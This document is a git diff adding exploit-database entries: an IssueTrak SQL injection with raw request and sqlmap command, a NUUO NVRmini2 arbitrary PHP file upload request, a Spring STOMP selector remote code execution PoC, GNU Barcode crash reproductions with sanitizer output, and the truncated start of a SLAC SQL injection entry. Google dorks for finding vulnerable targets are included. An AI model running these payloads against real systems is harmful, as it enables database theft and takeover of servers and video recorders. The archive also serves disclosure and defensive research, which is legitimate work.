diff --git a/exploits/asp/webapps/44792.txt b/exploits/asp/webapps/44792.txt
new file mode 100644
index 000000000..7a775937c
--- /dev/null
+++ b/exploits/asp/webapps/44792.txt
@@ -0,0 +1,71 @@
+================
+Exploit Title: SQL Injection Vulnerability in Issue Trak <= 7.0 (Possibly applicable up to version 9.7)
+Date: 05-28-2018
+Vendor Homepage: http://issuetrak.com
+Version: Confirmed 7.0; <= 7.0 extremely likely; up to 9.7 very likely
+Google Dork: inurl:"IssueTrak" inurl:"asp"
+Discovered By: Chris Anastasio
+================
+
+
+Vulnerable Endpoint
+===================
+www.example.com/IssueTrak/IssueSearch_Process.asp
+
+
+
+Vulnerable Parameters
+=====================
+Status
+Priority
+inp_IssueType
+SubmittedBy
+EnteredBy
+AssignedTo
+AssignedBy
+NextActionBy
+ClosedBy
+ProjectManager
+inp_OrgID
+
+
+
+Raw HTTP Request
+===========================
+POST /IssueTrak/IssueSearch_Process.asp HTTP/1.1
+Host: example.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 905
+
+TestField=dummy&Mode=&Deleted=false&ReportID=x&Status=*&SubstatusID=&Priority=&inp_IssueType=&HiddenSubtype=&HiddenSubtype2=&inp_IssueSubTypeMem=-1&SearchAll=fds&Subject=&NoteText=&Solution=&UserDef1=&CSOneID=&CSTwoID=&UserDef3=&CSThreeID=&UserDef4=&CSFourID=&SubmittedBy=&EnteredBy=&AssignedTo=&EverAssignedTo=&AssignedBy=&NextActionBy=&ClosedBy=&ProjectManager=&inp_OrgID=&OrganizationIssues=&TaskAssignedTo=&method_TargetDate=&start_TargetDate=&end_TargetDate=&method_DateOpened=&start_DateOpened=&end_DateOpened=&method_DateClosed=&start_DateClosed=&end_DateClosed=&TimeOpen=&TimeOpenDays=More&AdjTimeOpen=&AdjTimeOpenDays=More&Hours=&TimeOpenHours=More&TaskDescription=&TaskAssignedToName=&method_TaskDateCompleted=&start_TaskDateCompleted=&end_TaskDateCompleted=&Title=&OutputOptions=BriefList&ShowCriteria=on&SortOn1=&SortOrder1=Asc&SortOn2=&SortOrder2=Asc&SortOn3=&SortOrder3=Asc
+
+
+
+SQLMap command
+==============
+sqlmap -r issueTrakSearchReq.txt --dbms=mssql --level=5 --batch
+Notes: 
+	- "issueTrakSearchReq.txt" should be a plain text file containing the raw HTTP request shown above. 
+	- The "Host" header of the HTTP request should be updated with an IP address that hosts an IssueTrak 7.0 installation.
+
+	
+	
+Notes
+=====
+- A SQL injection vulnerability has been identified in IssueTrak 7.0 which, if successfully exploited, could allow an attacker to access sensitive information in the database. 
+- Authentication is generally required in order to hit this endpoint. If a non SQL injection request is made the reuslt is a redirect to the login page. However, it seems that on the back end, this request touches the database even without authentication, making it exploitable from a pre-authentication vantage point.
+- IssueTrak 7.0 was released in 2006
+
+
+
+Timeline
+========
+2018-05-18: Initial vendor contact
+2018-05-21: Vendor implies that this version of IssueTrak is no longer supported. Also states that releases starting with 9.7 the application does not suffer from thsi vulnerability
+2016-05-28: PoC details published
+
+
+
+About Illumant
+==============
+Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks.  Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant.  For more information, visit https://illumant.com/
\ No newline at end of file
diff --git a/exploits/hardware/webapps/44794.txt b/exploits/hardware/webapps/44794.txt
new file mode 100644
index 000000000..e64136357
--- /dev/null
+++ b/exploits/hardware/webapps/44794.txt
@@ -0,0 +1,75 @@
+# Exploit Title: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
+# Google Dork: intitle:NUUO Network Video Recorder Login
+# Date: 2018-05-20
+# Exploit Author: M3@Pandas
+# Vendor Homepage: http://www.nuuo.com
+# Software Link: N/A
+# Version: all
+# Tested on: PHP Linux
+# CVE : CVE-2018-11523
+
+==========================
+Advisory: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
+Author: M3@pandas From DBAppSecurity
+Affected Version: All
+==========================
+Vulnerability Description
+==========================
+
+
+Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO NVRmini2' program, NVRmini2 is widely used all over 
+the world.
+
+
+Vulnerable cgi: /upload.php
+
+
+<?php
+//echo $_FILES['userfile']['type'];
+//echo ":";
+//echo $_FILES['userfile']['size'];
+//echo ":";
+//echo urldecode($_FILES['userfile']['name']);
+//echo ":";
+//echo $_FILES['userfile']['tmp_name'];
+//echo ":";
+//echo $_FILES['userfile']['error'];
+//echo ":";
+echo $_FILES['userfile']['name'];
+copy($_FILES["userfile"]["tmp_name"],$_FILES['userfile']['name']);
+?>
+
+
+
+
+As the code above, no any filter, so we can upload a php shell directly to the web server.
+
+
+==========================
+POC  EXP
+==========================
+
+
+1. Upload 'nuuonvr.php' to web root path:
+
+POST /upload.php HTTP/1.1
+Host: 192.168.10.1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: multipart/form-data; boundary=--------969849961
+Content-Length: 162
+
+----------969849961
+Content-Disposition: form-data; name="userfile"; filename="nuuonvr.php"
+
+?php phpinfo();@unlink(__FILE__);?
+----------969849961--
+
+
+2. Check if the php file is uploaded successfully:
+	GET http://192.168.10.1/nuuonvr.php
+
+ If the page returns phpinfo info, target is vulnerable!
\ No newline at end of file
diff --git a/exploits/java/webapps/44796.txt b/exploits/java/webapps/44796.txt
new file mode 100644
index 000000000..430f83ade
--- /dev/null
+++ b/exploits/java/webapps/44796.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution
+# Date: 2018-05-28
+# Exploit Author: JameelNabbo
+# Website: jameelnabbo.com <http://jameelnabbo.com/>
+# Vendor Homepage:
+# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
+# CVE: CVE: CVE-2018-1270
+# Version: <= 5.0.x 
+
+# Description: By connecting to spring STOMP, and putting the key for "selector" 
+# header, we can execute code on Spring.
+
+# POC:
+# Here' we are writting java commands to be executed within the selector header
+# Connecting to a web socket using SockJS
+# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable
+
+var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"};
+
+var socket = new SockJS('/gs-guide-websocket');
+var stompClient = webstomp.over(socket);
+stompClient.connect({}, function (frame){
+	setConnected(true);
+	console.log('Connected: ' + frame);
+	stompClient.subscribe('/topic/greetings', function(greeting){
+		showGreeting(JSON.parse(greeting.body).content);
+		},header);
+});
\ No newline at end of file
diff --git a/exploits/linux/local/44797.txt b/exploits/linux/local/44797.txt
new file mode 100644
index 000000000..d40feae89
--- /dev/null
+++ b/exploits/linux/local/44797.txt
@@ -0,0 +1,188 @@
+# GNU Barcode 0.99 - Buffer Overflow
+# Vendor: The GNU Project | Free Software Foundation, Inc.
+# Product web page: https://www.gnu.org/software/barcode/
+# https://directory.fsf.org/wiki/Barcode
+# Author: Gjoko 'LiquidWorm' Krstic
+# Tested on: Ubuntu 16.04.4
+# Affected version: 0.99
+
+# Summary: GNU Barcode is a tool to convert text strings to printed bars.
+# It supports a variety of standard codes to represent the textual strings
+# and creates postscript output.
+
+# Desc: The vulnerability is caused due to a boundary error in the processing
+# of an input file, which can be exploited to cause a buffer overflow when a
+# user processes e.g. a specially crafted file. Successful exploitation could
+# allow execution of arbitrary code on the affected machine.
+
+
+code93.c:
+
+165: strcat(partial, codeset[code]);
+166: checksum_str[checksum_len++] = code;
+167: 
+168: /* Encode the second character */
+169: code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet;
+170: strcat(partial, codeset[code]);
+171: checksum_str[checksum_len++] = code;
+
+lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -i id:000034,sig:06,src:000000,op:havoc,rep:128
+%!PS-Adobe-2.0
+%%Creator: "barcode", libbarcode sample frontend
+%%DocumentPaperSizes: A4
+%%EndComments
+%%EndProlog
+
+%%Page: 1 1
+
+% Printing barcode for "W+G$A+M%KWWGWWWWWWWW9WW", scaled  1.00, encoded using "code 39"
+% The space/bar succession is represented by the following widths (space first):
+% 01311313111333111111113111313111111133131131313111131111311311311131311313111131111131313113111111331333111111133311111111111133131333111111133311111113331111111333111111133311111113331111111333111111133311111111133113111333111111133311111113111113311131131311
+[
+%  height  xpos   ypos  width       height  xpos   ypos  width
+   [75.00  10.50  15.00  0.85]      [75.00  14.50  15.00  0.85]
+   [75.00  17.50  15.00  2.85]      [75.00  21.50  15.00  2.85]
+   [75.00  24.50  15.00  0.85]      [70.00  27.50  20.00  2.85]
+   [70.00  33.50  20.00  2.85]      [70.00  36.50  20.00  0.85]
+   [70.00  38.50  20.00  0.85]      [70.00  40.50  20.00  0.85]
+   [70.00  42.50  20.00  0.85]      [70.00  46.50  20.00  0.85]
+   [70.00  48.50  20.00  0.85]      [70.00  52.50  20.00  0.85]
+   [70.00  56.50  20.00  0.85]      [70.00  58.50  20.00  0.85]
+   [70.00  60.50  20.00  0.85]      [70.00  62.50  20.00  0.85]
+   [70.00  67.50  20.00  2.85]      [70.00  71.50  20.00  2.85]
+   [70.00  74.50  20.00  0.85]      [70.00  78.50  20.00  0.85]
+   [70.00  82.50  20.00  0.85]      [70.00  86.50  20.00  0.85]
+   [70.00  88.50  20.00  0.85]      [70.00  91.50  20.00  2.85]
+   [70.00  94.50  20.00  0.85]      [70.00  96.50  20.00  0.85]
+   [70.00 100.50  20.00  0.85]      [70.00 103.50  20.00  2.85]
+   [70.00 106.50  20.00  0.85]      [70.00 110.50  20.00  0.85]
+   [70.00 112.50  20.00  0.85]      [70.00 116.50  20.00  0.85]
+   [70.00 120.50  20.00  0.85]      [70.00 123.50  20.00  2.85]
+   [70.00 127.50  20.00  2.85]      [70.00 130.50  20.00  0.85]
+   [70.00 132.50  20.00  0.85]      [70.00 136.50  20.00  0.85]
+   [70.00 138.50  20.00  0.85]      [70.00 140.50  20.00  0.85]
+   [70.00 144.50  20.00  0.85]      [70.00 148.50  20.00  0.85]
+   [70.00 152.50  20.00  0.85]      [70.00 155.50  20.00  2.85]
+   [70.00 158.50  20.00  0.85]      [70.00 160.50  20.00  0.85]
+   [70.00 162.50  20.00  0.85]      [70.00 167.50  20.00  2.85]
+   [70.00 171.50  20.00  2.85]      [70.00 177.50  20.00  2.85]
+   [70.00 180.50  20.00  0.85]      [70.00 182.50  20.00  0.85]
+   [70.00 184.50  20.00  0.85]      [70.00 187.50  20.00  2.85]
+   [70.00 193.50  20.00  2.85]      [70.00 196.50  20.00  0.85]
+   [70.00 198.50  20.00  0.85]      [70.00 200.50  20.00  0.85]
+   [70.00 202.50  20.00  0.85]      [70.00 204.50  20.00  0.85]
+   [70.00 206.50  20.00  0.85]      [70.00 211.50  20.00  2.85]
+   [70.00 215.50  20.00  2.85]      [70.00 219.50  20.00  2.85]
+   [70.00 225.50  20.00  2.85]      [70.00 228.50  20.00  0.85]
+   [70.00 230.50  20.00  0.85]      [70.00 232.50  20.00  0.85]
+   [70.00 235.50  20.00  2.85]      [70.00 241.50  20.00  2.85]
+   [70.00 244.50  20.00  0.85]      [70.00 246.50  20.00  0.85]
+   [70.00 248.50  20.00  0.85]      [70.00 251.50  20.00  2.85]
+   [70.00 257.50  20.00  2.85]      [70.00 260.50  20.00  0.85]
+   [70.00 262.50  20.00  0.85]      [70.00 264.50  20.00  0.85]
+   [70.00 267.50  20.00  2.85]      [70.00 273.50  20.00  2.85]
+   [70.00 276.50  20.00  0.85]      [70.00 278.50  20.00  0.85]
+   [70.00 280.50  20.00  0.85]      [70.00 283.50  20.00  2.85]
+   [70.00 289.50  20.00  2.85]      [70.00 292.50  20.00  0.85]
+   [70.00 294.50  20.00  0.85]      [70.00 296.50  20.00  0.85]
+   [70.00 299.50  20.00  2.85]      [70.00 305.50  20.00  2.85]
+   [70.00 308.50  20.00  0.85]      [70.00 310.50  20.00  0.85]
+   [70.00 312.50  20.00  0.85]      [70.00 315.50  20.00  2.85]
+   [70.00 321.50  20.00  2.85]      [70.00 324.50  20.00  0.85]
+   [70.00 326.50  20.00  0.85]      [70.00 328.50  20.00  0.85]
+   [70.00 331.50  20.00  2.85]      [70.00 337.50  20.00  2.85]
+   [70.00 340.50  20.00  0.85]      [70.00 342.50  20.00  0.85]
+   [70.00 344.50  20.00  0.85]      [70.00 346.50  20.00  0.85]
+   [70.00 349.50  20.00  2.85]      [70.00 354.50  20.00  0.85]
+   [70.00 357.50  20.00  2.85]      [70.00 360.50  20.00  0.85]
+   [70.00 363.50  20.00  2.85]      [70.00 369.50  20.00  2.85]
+   [70.00 372.50  20.00  0.85]      [70.00 374.50  20.00  0.85]
+   [70.00 376.50  20.00  0.85]      [70.00 379.50  20.00  2.85]
+   [70.00 385.50  20.00  2.85]      [70.00 388.50  20.00  0.85]
+   [70.00 390.50  20.00  0.85]      [70.00 392.50  20.00  0.85]
+   [70.00 395.50  20.00  2.85]      [70.00 398.50  20.00  0.85]
+   [70.00 400.50  20.00  0.85]      [70.00 403.50  20.00  2.85]
+   [70.00 408.50  20.00  0.85]      [75.00 410.50  15.00  0.85]
+   [75.00 414.50  15.00  0.85]      [75.00 417.50  15.00  2.85]
+   [75.00 421.50  15.00  2.85]      [75.00 424.50  15.00  0.85]
+
+]	{ {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
+[
+%   char    xpos   ypos fontsize
+    [(W)   32.00  10.00 12.00]
+    [(+)   48.00  10.00  0.00]
+    [(G)   64.00  10.00  0.00]
+    [($)   80.00  10.00  0.00]
+    [(A)   96.00  10.00  0.00]
+    [(+)  112.00  10.00  0.00]
+    [(M)  128.00  10.00  0.00]
+    [(%)  144.00  10.00  0.00]
+    [(K)  160.00  10.00  0.00]
+    [(W)  176.00  10.00  0.00]
+    [(W)  192.00  10.00  0.00]
+    [(G)  208.00  10.00  0.00]
+    [(W)  224.00  10.00  0.00]
+    [(W)  240.00  10.00  0.00]
+    [(W)  256.00  10.00  0.00]
+    [(W)  272.00  10.00  0.00]
+    [(W)  288.00  10.00  0.00]
+    [(W)  304.00  10.00  0.00]
+    [(W)  320.00  10.00  0.00]
+    [(W)  336.00  10.00  0.00]
+    [(9)  352.00  10.00  0.00]
+    [(W)  368.00  10.00  0.00]
+    [(W)  384.00  10.00  0.00]
+]   { {} forall dup 0.00 ne {
+	/Helvetica findfont exch scalefont setfont
+    } {pop} ifelse
+    moveto show} bind forall
+% End barcode for "W+G$A+M%KWWGWWWWWWWW9WW"
+
+showpage
+%%Page: 2 2
+
+=================================================================
+==11076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000043bc02 at pc 0x00000042189a bp 0x7fff2f160c00 sp 0x7fff2f160bf0
+READ of size 1 at 0x00000043bc02 thread T0
+    #0 0x421899 in Barcode_93_encode /home/lqwrm/research/barcode-0.99/code93.c:169
+    #1 0x409ac2 in Barcode_Encode_and_Print /home/lqwrm/research/barcode-0.99/library.c:234
+    #2 0x402319 in main /home/lqwrm/research/barcode-0.99/main.c:564
+    #3 0x7f9b8745282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
+    #4 0x404708 in _start (/home/lqwrm/research/barcode-0.99/barcode+0x404708)
+
+0x00000043bc02 is located 32 bytes to the right of global variable '*.LC6' defined in 'code93.c' (0x43bbe0) of size 2
+  '*.LC6' is ascii string '1'
+0x00000043bc02 is located 30 bytes to the left of global variable 'CSWTCH.16' defined in 'code93.c:146:5' (0x43bc20) of size 48
+SUMMARY: AddressSanitizer: global-buffer-overflow /home/lqwrm/research/barcode-0.99/code93.c:169 Barcode_93_encode
+Shadow bytes around the buggy address:
+  0x00008007f730: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
+  0x00008007f740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x00008007f750: 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
+  0x00008007f760: f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
+  0x00008007f770: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 02 f9 f9 f9
+=>0x00008007f780:[f9]f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9
+  0x00008007f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x00008007f7a0: 01 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+  0x00008007f7b0: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9
+  0x00008007f7c0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
+  0x00008007f7d0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+==11076==ABORTING
\ No newline at end of file
diff --git a/exploits/linux/local/44798.txt b/exploits/linux/local/44798.txt
new file mode 100644
index 000000000..bd7a2104b
--- /dev/null
+++ b/exploits/linux/local/44798.txt
@@ -0,0 +1,207 @@
+# GNU Barcode 0.99 - Memory Leak
+# Vendor: The GNU Project | Free Software Foundation, Inc.
+# Product web page: https://www.gnu.org/software/barcode/
+# https://directory.fsf.org/wiki/Barcode
+# Affected version: 0.99
+# Tested on: Ubuntu 16.04.4
+# Author: Gjoko 'LiquidWorm' Krstic
+
+# Summary: GNU Barcode is a tool to convert text strings to printed bars.
+# It supports a variety of standard codes to represent the textual strings
+# and creates postscript output.
+
+# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
+# by malicious people to cause a DoS (Denial of Service). The vulnerability is
+# caused due to an error in the 'cmdline.c', which can be exploited to cause a
+# memory leak via a specially crafted file. The vulnerability is confirmed in
+# version 0.99. Other versions may also be affected.
+
+cmdline.c:
+
+128: int commandline(struct commandline *args, int argc, char **argv,
+129:                 char *errorhead)
+130: {
+131:     struct commandline *ptr;
+132:     char *getopt_desc = (char *)calloc(512, 1);
+133:     int desc_offset = 0;
+134:     int opt, retval;
+135:     char *value;
+
+lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
+%!PS-Adobe-2.0
+%%Creator: "barcode", libbarcode sample frontend
+%%DocumentPaperSizes: A4
+%%EndComments
+%%EndProlog
+
+%%Page: 1 1
+
+% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled  1.00, encoded using "code 128-B"
+% The space/bar succession is represented by the following widths (space first):
+% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
+[
+%  height  xpos   ypos  width       height  xpos   ypos  width
+   [75.00  11.00  15.00  1.85]      [75.00  13.50  15.00  0.85]
+   [75.00  16.50  15.00  0.85]      [70.00  21.50  20.00  0.85]
+   [70.00  27.00  20.00  3.85]      [70.00  30.50  20.00  0.85]
+   [70.00  32.50  20.00  0.85]      [70.00  35.50  20.00  2.85]
+   [70.00  40.00  20.00  1.85]      [70.00  43.50  20.00  0.85]
+   [70.00  48.50  20.00  0.85]      [70.00  51.00  20.00  1.85]
+   [70.00  54.50  20.00  0.85]      [70.00  57.50  20.00  0.85]
+   [70.00  62.00  20.00  3.85]      [70.00  65.50  20.00  0.85]
+   [70.00  68.50  20.00  0.85]      [70.00  71.00  20.00  1.85]
+   [70.00  76.50  20.00  0.85]      [70.00  80.00  20.00  3.85]
+   [70.00  84.50  20.00  0.85]      [70.00  87.50  20.00  0.85]
+   [70.00  91.00  20.00  1.85]      [70.00  96.50  20.00  0.85]
+   [70.00  98.50  20.00  0.85]      [70.00 101.00  20.00  1.85]
+   [70.00 104.50  20.00  0.85]      [70.00 109.50  20.00  0.85]
+   [70.00 113.00  20.00  3.85]      [70.00 117.50  20.00  0.85]
+   [70.00 120.50  20.00  0.85]      [70.00 123.50  20.00  2.85]
+   [70.00 128.00  20.00  1.85]      [70.00 131.50  20.00  0.85]
+   [70.00 137.00  20.00  1.85]      [70.00 139.50  20.00  0.85]
+   [70.00 142.50  20.00  0.85]      [70.00 147.50  20.00  0.85]
+   [70.00 151.00  20.00  1.85]      [70.00 154.50  20.00  2.85]
+   [70.00 158.50  20.00  0.85]      [70.00 162.00  20.00  1.85]
+   [70.00 164.50  20.00  0.85]      [70.00 168.50  20.00  2.85]
+   [70.00 172.00  20.00  1.85]      [70.00 175.50  20.00  0.85]
+   [70.00 179.50  20.00  2.85]      [70.00 183.00  20.00  1.85]
+   [70.00 186.50  20.00  0.85]      [70.00 190.50  20.00  2.85]
+   [70.00 194.00  20.00  1.85]      [70.00 197.50  20.00  0.85]
+   [70.00 201.50  20.00  2.85]      [70.00 205.00  20.00  1.85]
+   [70.00 209.00  20.00  1.85]      [70.00 212.50  20.00  0.85]
+   [70.00 215.50  20.00  2.85]      [70.00 220.00  20.00  1.85]
+   [70.00 223.50  20.00  0.85]      [70.00 227.50  20.00  2.85]
+   [70.00 230.50  20.00  0.85]      [70.00 233.00  20.00  1.85]
+   [70.00 237.50  20.00  2.85]      [70.00 241.50  20.00  0.85]
+   [70.00 245.00  20.00  3.85]      [70.00 249.50  20.00  0.85]
+   [70.00 252.50  20.00  0.85]      [70.00 258.00  20.00  1.85]
+   [70.00 260.50  20.00  0.85]      [70.00 263.50  20.00  0.85]
+   [70.00 267.00  20.00  1.85]      [70.00 269.50  20.00  0.85]
+   [70.00 275.50  20.00  2.85]      [70.00 279.50  20.00  0.85]
+   [70.00 283.00  20.00  1.85]      [70.00 285.50  20.00  0.85]
+   [70.00 289.50  20.00  2.85]      [70.00 293.00  20.00  1.85]
+   [70.00 297.00  20.00  1.85]      [70.00 301.50  20.00  2.85]
+   [70.00 304.50  20.00  0.85]      [70.00 307.50  20.00  0.85]
+   [70.00 310.00  20.00  1.85]      [70.00 314.50  20.00  2.85]
+   [70.00 318.50  20.00  0.85]      [70.00 322.00  20.00  3.85]
+   [70.00 326.50  20.00  0.85]      [70.00 329.50  20.00  0.85]
+   [70.00 332.50  20.00  0.85]      [70.00 337.00  20.00  3.85]
+   [70.00 340.50  20.00  0.85]      [70.00 345.50  20.00  0.85]
+   [70.00 348.00  20.00  1.85]      [70.00 352.50  20.00  2.85]
+   [70.00 356.50  20.00  0.85]      [70.00 360.00  20.00  1.85]
+   [70.00 362.50  20.00  0.85]      [70.00 366.50  20.00  2.85]
+   [70.00 370.00  20.00  1.85]      [70.00 373.50  20.00  0.85]
+   [70.00 377.50  20.00  2.85]      [70.00 381.00  20.00  1.85]
+   [70.00 384.50  20.00  0.85]      [70.00 388.50  20.00  2.85]
+   [70.00 392.00  20.00  1.85]      [70.00 395.50  20.00  0.85]
+   [70.00 399.50  20.00  2.85]      [70.00 403.00  20.00  1.85]
+   [70.00 406.50  20.00  0.85]      [70.00 410.50  20.00  2.85]
+   [70.00 414.00  20.00  1.85]      [70.00 417.50  20.00  0.85]
+   [70.00 421.50  20.00  2.85]      [70.00 425.00  20.00  1.85]
+   [70.00 428.50  20.00  0.85]      [70.00 431.00  20.00  1.85]
+   [70.00 435.50  20.00  2.85]      [70.00 439.50  20.00  0.85]
+   [70.00 445.00  20.00  3.85]      [70.00 448.50  20.00  0.85]
+   [70.00 450.50  20.00  0.85]      [70.00 452.50  20.00  0.85]
+   [70.00 457.00  20.00  3.85]      [70.00 462.50  20.00  2.85]
+   [70.00 466.50  20.00  0.85]      [70.00 470.00  20.00  1.85]
+   [70.00 472.50  20.00  0.85]      [70.00 476.00  20.00  1.85]
+   [70.00 481.50  20.00  0.85]      [70.00 483.50  20.00  0.85]
+   [70.00 486.50  20.00  0.85]      [70.00 489.00  20.00  1.85]
+   [70.00 496.00  20.00  3.85]      [70.00 499.50  20.00  0.85]
+   [70.00 502.50  20.00  0.85]      [70.00 505.50  20.00  0.85]
+   [70.00 511.00  20.00  3.85]      [70.00 514.50  20.00  0.85]
+   [70.00 516.50  20.00  0.85]      [70.00 521.50  20.00  0.85]
+   [70.00 524.00  20.00  1.85]      [70.00 527.50  20.00  0.85]
+   [70.00 530.00  20.00  1.85]      [70.00 534.50  20.00  2.85]
+   [70.00 538.50  20.00  0.85]      [70.00 541.50  20.00  0.85]
+   [70.00 546.00  20.00  3.85]      [70.00 549.50  20.00  0.85]
+   [70.00 552.00  20.00  1.85]      [70.00 555.50  20.00  0.85]
+   [70.00 560.50  20.00  0.85]      [70.00 562.50  20.00  0.85]
+   [70.00 567.00  20.00  3.85]      [70.00 572.50  20.00  2.85]
+   [70.00 576.50  20.00  0.85]      [70.00 580.00  20.00  1.85]
+   [70.00 582.50  20.00  0.85]      [70.00 586.50  20.00  2.85]
+   [70.00 591.00  20.00  1.85]      [70.00 594.00  20.00  1.85]
+   [70.00 598.50  20.00  2.85]      [70.00 602.50  20.00  0.85]
+   [70.00 605.50  20.00  2.85]      [70.00 608.50  20.00  0.85]
+   [70.00 612.00  20.00  1.85]      [70.00 615.50  20.00  0.85]
+   [70.00 620.00  20.00  1.85]      [70.00 622.50  20.00  0.85]
+   [75.00 627.00  15.00  1.85]      [75.00 632.50  15.00  2.85]
+   [75.00 635.50  15.00  0.85]      [75.00 638.00  15.00  1.85]
+
+] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
+[
+%   char    xpos   ypos fontsize
+    [(o)   21.00  10.00 12.00]
+    [(/)   32.00  10.00  0.00]
+    [(c)   43.00  10.00  0.00]
+    [(r)   54.00  10.00  0.00]
+    [(a)   65.00  10.00  0.00]
+    [(s)   76.00  10.00  0.00]
+    [(h)   87.00  10.00  0.00]
+    [(e)   98.00  10.00  0.00]
+    [(s)  109.00  10.00  0.00]
+    [(/)  120.00  10.00  0.00]
+    [(i)  131.00  10.00  0.00]
+    [(d)  142.00  10.00  0.00]
+    [(:)  153.00  10.00  0.00]
+    [(0)  164.00  10.00  0.00]
+    [(0)  175.00  10.00  0.00]
+    [(0)  186.00  10.00  0.00]
+    [(0)  197.00  10.00  0.00]
+    [(3)  208.00  10.00  0.00]
+    [(4)  219.00  10.00  0.00]
+    [(,)  230.00  10.00  0.00]
+    [(s)  241.00  10.00  0.00]
+    [(i)  252.00  10.00  0.00]
+    [(g)  263.00  10.00  0.00]
+    [(:)  274.00  10.00  0.00]
+    [(0)  285.00  10.00  0.00]
+    [(6)  296.00  10.00  0.00]
+    [(,)  307.00  10.00  0.00]
+    [(s)  318.00  10.00  0.00]
+    [(r)  329.00  10.00  0.00]
+    [(c)  340.00  10.00  0.00]
+    [(:)  351.00  10.00  0.00]
+    [(0)  362.00  10.00  0.00]
+    [(0)  373.00  10.00  0.00]
+    [(0)  384.00  10.00  0.00]
+    [(0)  395.00  10.00  0.00]
+    [(0)  406.00  10.00  0.00]
+    [(0)  417.00  10.00  0.00]
+    [(,)  428.00  10.00  0.00]
+    [(o)  439.00  10.00  0.00]
+    [(p)  450.00  10.00  0.00]
+    [(:)  461.00  10.00  0.00]
+    [(h)  472.00  10.00  0.00]
+    [(a)  483.00  10.00  0.00]
+    [(v)  494.00  10.00  0.00]
+    [(o)  505.00  10.00  0.00]
+    [(c)  516.00  10.00  0.00]
+    [(,)  527.00  10.00  0.00]
+    [(r)  538.00  10.00  0.00]
+    [(e)  549.00  10.00  0.00]
+    [(p)  560.00  10.00  0.00]
+    [(:)  571.00  10.00  0.00]
+    [(1)  582.00  10.00  0.00]
+    [(2)  593.00  10.00  0.00]
+    [(8)  604.00  10.00  0.00]
+]   { {} forall dup 0.00 ne {
+  /Helvetica findfont exch scalefont setfont
+    } {pop} ifelse
+    moveto show} bind forall
+% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"
+
+showpage
+%%Trailer
+
+==2183==ERROR: LeakSanitizer: detected memory leaks
+
+Direct leak of 512 byte(s) in 1 object(s) allocated from:
+    #0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
+    #1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132
+
+Direct leak of 55 byte(s) in 1 object(s) allocated from:
+    #0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
+    #1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)
+
+SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).
\ No newline at end of file
diff --git a/exploits/php/webapps/44793.txt b/exploits/php/webapps/44793.txt
new file mode 100644
index 000000000..209f7bcc5
--- /dev/null
+++ b/exploits/php/webapps/44793.txt
@@ -0,0 +1,85 @@
+# # # # # 
+# Exploit Title: SLAC v1.0: Blind SQL Injection / XPath Injection
+# Date: 29-05-2018
+# Vendor Homepage: https://sitemakin.com/login-script-demo
+# Exploit Author: Divya Jain
+# Version: v1.0
+# CVE: CVE-2018-11535
+# Category: Webapps
+# Severity: High
+# Tested on: KaLi LinuX_x64
+# # # # #
+
+# Proof of Concept:
+        ////////////////////////////////////////////////
+          SQL Injection in "my_item_search" parameter
+       ////////////////////////////////////////////////
+    
